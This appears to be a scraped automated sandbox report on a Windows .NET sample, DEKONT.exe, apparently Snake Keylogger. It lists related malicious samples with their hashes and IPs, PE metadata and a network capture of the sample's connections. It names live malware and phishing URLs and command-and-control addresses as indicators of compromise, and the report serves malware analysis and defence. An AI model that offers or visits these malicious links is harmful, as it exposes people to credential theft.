                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        109__Purchase_Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          FGT5000800000.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            checkip.dyndns.come-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            order.exeGet hashmaliciousUnknownBrowse
                                                            • 158.101.44.242
                                                            0FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • 193.122.6.168
                                                            M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • 132.226.247.73
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            sample1.exeGet hashmaliciousSeclesBot, TrojanRansomBrowse
                                                            • 132.226.247.73
                                                            UbMsBrTi5s.exeGet hashmaliciousUnknownBrowse
                                                            • 193.122.6.168
                                                            Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            scratchdreams.tke-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            reallyfreegeoip.orge-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ORACLE-BMC-31898USe-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            • 192.29.11.142
                                                            Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 193.122.130.38
                                                            ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            pGTQLD9ukH.elfGet hashmaliciousMiraiBrowse
                                                            • 193.122.239.120
                                                            pJNcZyhUh8.elfGet hashmaliciousMiraiBrowse
                                                            • 193.122.239.110
                                                            g2PqnVy6cQ.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 144.25.156.10
                                                            b3astmode.x86.elfGet hashmaliciousUnknownBrowse
                                                            • 168.138.235.164
                                                            order.exeGet hashmaliciousUnknownBrowse
                                                            • 158.101.44.242
                                                            KSRRrEMt1w.elfGet hashmaliciousMiraiBrowse
                                                            • 147.154.227.149
                                                            CLOUDFLARENETUShttps://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
                                                            • 104.21.91.122
                                                            M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                            • 172.67.139.220
                                                            https://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 104.26.12.205
                                                            https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.2.184
                                                            iwjvkEAIQa.rtfGet hashmaliciousUnknownBrowse
                                                            • 172.67.187.200
                                                            8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                            • 172.67.139.220
                                                            xF3wienia PO2102559-1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 172.67.215.45
                                                            https://tibusiness.cl/css/causarol.rarGet hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            CLOUDFLARENETUShttps://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
                                                            • 104.21.91.122
                                                            M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                            • 172.67.139.220
                                                            https://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                            • 104.26.12.205
                                                            https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.2.184
                                                            iwjvkEAIQa.rtfGet hashmaliciousUnknownBrowse
                                                            • 172.67.187.200
                                                            8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                            • 172.67.139.220
                                                            xF3wienia PO2102559-1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 172.67.215.45
                                                            https://tibusiness.cl/css/causarol.rarGet hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9ade-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            SecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 104.21.67.152
                                                            https://docs.google.com/presentation/d/e/2PACX-1vTSXaY7ubI0TsmtDZGhnfi1zhnSxguMyu2LhG-ysNsdY7OPzg5AMGaTqcxwu9_JVEAMwiEcyOI9wHoz/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                            • 104.21.67.152
                                                            hRsK5gPX8l.exeGet hashmaliciousXehook StealerBrowse
                                                            • 104.21.67.152
                                                            T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                            • 104.21.67.152
                                                            T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                            • 104.21.67.152
                                                            SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                            • 104.21.67.152
                                                            mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                            • 104.21.67.152
                                                            mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                            • 104.21.67.152
                                                            M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • 104.21.67.152
                                                            3b5074b1b5d032e5620f69f9f700ff0e17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 104.21.27.85
                                                            load_startup.txt.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.21.27.85
                                                            M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.21.27.85
                                                            F#U0130YAT TEKL#U0130F.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                            • 104.21.27.85
                                                            New DHL Shipment Document Arrival Notice.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            hesaphareketi_1.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.21.27.85
                                                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            No context
                                                            Process:C:\Users\user\Desktop\DEKONT.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.363765319780092
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:DEKONT.exe
                                                            File size:971'776 bytes
                                                            MD5:384c4da2b75f4c7a1fa5585bc07634e6
                                                            SHA1:27d368536af080b92d543f9c24af8596cc0edd6d
                                                            SHA256:8980e6e2628b4103f4e3e0b01365a5e9a7df6e38c067c93633371c94b3d5dd34
                                                            SHA512:6b7919c2cb1a0900dad45b9d0a44aa7b7ff20a24cad142704978f3737f16ee5df0c3b9d2b1c5de05a0e565a9dfe591a82e7706eeda98c818d7a2840050f160b1
                                                            SSDEEP:12288:mF2iNryhiHr2JXAfykubkHwObkzi4pYv0lv312Z3:mF1lyhiHrAXAaXbkHwZ1qMJ312Z
                                                            TLSH:CF256DD1F1508D97E86F06F2AD2A643025E3BE9D54A4C10C5A99BB5B36F3342209FE1F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D...........b... ........@.. .......................@............@................................
                                                            Icon Hash:aea4accc16a3d9be
                                                            Entrypoint:0x4a62a2
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x8DFED4A7 [Wed Jun 28 18:40:39 2045 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            inc esi
                                                            dec edi
                                                            push edx
                                                            xor al, 54h
                                                            xor eax, 42384738h
                                                            aaa
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [edi], dh
                                                            cmp byte ptr [ecx+50h], dl
                                                            xor eax, 36374734h
                                                            pop edx
                                                            inc ebx
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa624d0x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x48aac.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xf20000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa251c0x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xa42c80xa440004552619d31f43dd928e2ad108f5213aFalse0.9118225004756468data7.894619562911896IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xa80000x48aac0x48c0051557ee744ca5e22f51770688b12c303False0.0632215152491409data4.771204243342389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xf20000xc0x200630295826c3b58f2e49b6824a3673c7cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xa82e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                            RT_ICON0xa89480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                            RT_ICON0xa8c300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                            RT_ICON0xa8d580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                            RT_ICON0xa9c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                            RT_ICON0xaa4a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                            RT_ICON0xaaa100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                            RT_ICON0xeca380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                            RT_ICON0xeefe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                            RT_ICON0xf00880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                            RT_GROUP_ICON0xf04f00x92data0.5753424657534246
                                                            RT_VERSION0xf05840x33cdata0.427536231884058
                                                            RT_MANIFEST0xf08c00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 24, 2024 10:12:03.319567919 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:03.623764992 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:03.624131918 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:03.624500990 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:03.933546066 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:04.560245991 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:04.571971893 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:04.875252008 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:04.876972914 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:04.917926073 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:05.177871943 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.177906990 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.177973032 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.187628031 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.187648058 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.536119938 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.536227942 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.543389082 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.543401957 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.543863058 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.589725971 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.595406055 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.640111923 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.896486044 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.896625996 CEST44349709104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:05.896783113 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.903105974 CEST49709443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:05.906738997 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:06.250719070 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:06.254301071 CEST49710443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:06.254358053 CEST44349710104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:06.254424095 CEST49710443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:06.254683018 CEST49710443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:06.254699945 CEST44349710104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:06.292835951 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:06.588880062 CEST44349710104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:06.591666937 CEST49710443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:06.591711998 CEST44349710104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:06.968854904 CEST44349710104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:06.969105005 CEST44349710104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:06.969166040 CEST49710443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:06.969562054 CEST49710443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:06.974662066 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:06.976347923 CEST4971280192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:07.280805111 CEST8049707193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:07.280875921 CEST4970780192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:07.288424015 CEST8049712193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:07.288525105 CEST4971280192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:07.288696051 CEST4971280192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:07.596345901 CEST8049712193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:07.803047895 CEST8049712193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:07.804737091 CEST49714443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:07.804776907 CEST44349714104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:07.804905891 CEST49714443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:07.805218935 CEST49714443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:07.805237055 CEST44349714104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:07.855355024 CEST4971280192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:08.142251015 CEST44349714104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:08.145404100 CEST49714443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:08.145445108 CEST44349714104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:08.513799906 CEST44349714104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:08.514070034 CEST44349714104.21.67.152192.168.2.8
                                                            Apr 24, 2024 10:12:08.514570951 CEST49714443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:08.515059948 CEST49714443192.168.2.8104.21.67.152
                                                            Apr 24, 2024 10:12:08.518625975 CEST4971280192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:08.519779921 CEST4971580192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:08.823577881 CEST8049715193.122.6.168192.168.2.8
                                                            Apr 24, 2024 10:12:08.823668957 CEST4971580192.168.2.8193.122.6.168
                                                            Apr 24, 2024 10:12:08.823833942 CEST4971580192.168.2.8193.122.6.168
